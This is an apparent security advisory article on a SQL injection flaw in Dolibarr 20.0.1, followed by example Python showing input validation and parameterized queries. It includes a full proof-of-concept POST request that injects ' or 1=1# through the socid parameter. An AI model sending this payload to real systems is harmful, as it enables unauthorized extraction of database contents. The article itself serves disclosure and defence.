Dolibarr 20.0.1 SQL Injection Vulnerability Reported by The Cyber Post

Dolibarr version 20.0.1 has been identified as vulnerable to a remote SQL injection attack, as reported by cybersecurity researcher nu11secur1ty. An attacker can inject SQL through the socid parameter and retrieve sensitive information from the MySQL database. The attack is launched online, from within the system.

The severity of this vulnerability is classified as medium. By leveraging a vulnerable security token to gain access to the web application, an attacker can execute SQL injection attacks and extract confidential data from the database.

In a simulated exploit scenario, an attacker could manipulate the socid parameter in a POST request to the Dolibarr application, injecting malicious SQL code to retrieve desired information. By crafting a specific payload containing SQL injection commands, the attacker can bypass security measures and extract sensitive data from the database remotely.

The following sample request carries the injection in the socid field of the POST body:

POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 357

token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status[]=0&object_status[]=1&object_status[]=2&object_status[]=3&object_status[]=4&object_status[]=5&object_status[]=6,7&object_status[]=9&year=2024&submit=Refresh

The response to the exploit payload reveals the successful execution of the SQL injection attack, as indicated by the retrieval of data from the database and potential error messages related to the manipulation of SQL syntax.

It is crucial for organizations using Dolibarr version 20.0.1 to apply security patches or updates provided by the vendor to mitigate the risk of SQL injection vulnerabilities. Additionally, implementing best practices such as input validation and parameterized queries can help prevent such attacks in the future.
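
The two mitigations named above, input validation and a parameterized query, applied to the socid field as an added example (this is not Dolibarr's code). Python's sqlite3 stands in for MySQL, and the orders table, its columns and the function names are assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample body: a subset of the fields in the request shown on this
# page, with the socid value copied from it.
SAMPLE_BODY = "mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&year=2024"
INT_ID = re.compile(r"-?[0-9]{1,10}")  # plain integer, optional sign

def parse_socid(raw):
    """Return socid as an int, or raise ValueError if it is not a plain integer."""
    if raw is None or not INT_ID.fullmatch(raw):
        raise ValueError("socid must be an integer")
    return int(raw)

def make_db():
    """In-memory stand-in for an orders table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, fk_soc INTEGER, total REAL)")
    conn.executemany("INSERT INTO orders (fk_soc, total) VALUES (?, ?)",
                     [(1, 100.0), (1, 50.0), (2, 75.0)])
    return conn

def order_stats(conn, form_body):
    """Validate socid from a urlencoded body, then query with a bound parameter."""
    fields = parse_qs(form_body, keep_blank_values=True)
    socid = parse_socid(fields.get("socid", [None])[0])
    row = conn.execute(
        "SELECT COUNT(*), COALESCE(SUM(total), 0) FROM orders WHERE fk_soc = ?",
        (socid,),
    ).fetchone()
    return {"socid": socid, "count": row[0], "total": row[1]}

def bound_without_validation(conn, raw_socid):
    """Second layer: a bound value is compared as data, never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM orders WHERE fk_soc = ?"
    return conn.execute(sql, (raw_socid,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    print(order_stats(db, "mode=supplier&socid=1&year=2024"))
    try:
        order_stats(db, SAMPLE_BODY)
    except ValueError as exc:
        print("rejected:", exc)
    print(bound_without_validation(db, "-1nu11secur1ty' or 1=1#"))
```

Validation rejects the request before any SQL is built, and the bound parameter ensures that a value which slips past validation still cannot change the structure of the query.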

In conclusion, the SQL injection vulnerability in Dolibarr version 20.0.1 highlights the importance of proactive cybersecurity measures to safeguard against potential threats and secure sensitive data stored in databases. Organizations are advised to stay informed about security vulnerabilities and take necessary actions to protect their systems from malicious exploitation.
